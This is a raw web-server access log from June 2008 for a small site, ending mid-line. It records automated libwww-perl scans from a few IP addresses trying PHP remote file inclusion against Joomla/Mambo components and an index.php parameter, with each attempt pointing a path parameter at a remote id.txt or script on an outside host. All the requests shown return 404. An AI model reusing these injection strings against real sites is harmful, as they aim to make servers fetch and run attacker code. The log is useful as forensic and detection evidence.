74.86.129.164 - - [15/Jun/2008:20:41:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.86.129.164 - - [15/Jun/2008:20:41:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:13 -0700] "GET /logs/access.log///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:14 -0700] "GET ///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:14 -0700] "GET /logs///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:15 -0700] "GET /logs/access.log///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:15 -0700] "GET ///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:15 -0700] "GET /logs///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:17 -0700] "GET /logs/access.log///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:17 -0700] "GET ///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:17 -0700] "GET /logs///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:31 -0700] "GET /logs/access.log///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:32 -0700] "GET ///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:20:41:32 -0700] "GET /logs///index.php?p=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:40 -0700] "GET /logs/access_080414.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:50 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/tandry87/test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
217.198.149.178 - - [15/Jun/2008:20:41:51 -0700] "GET /logs/administrator/c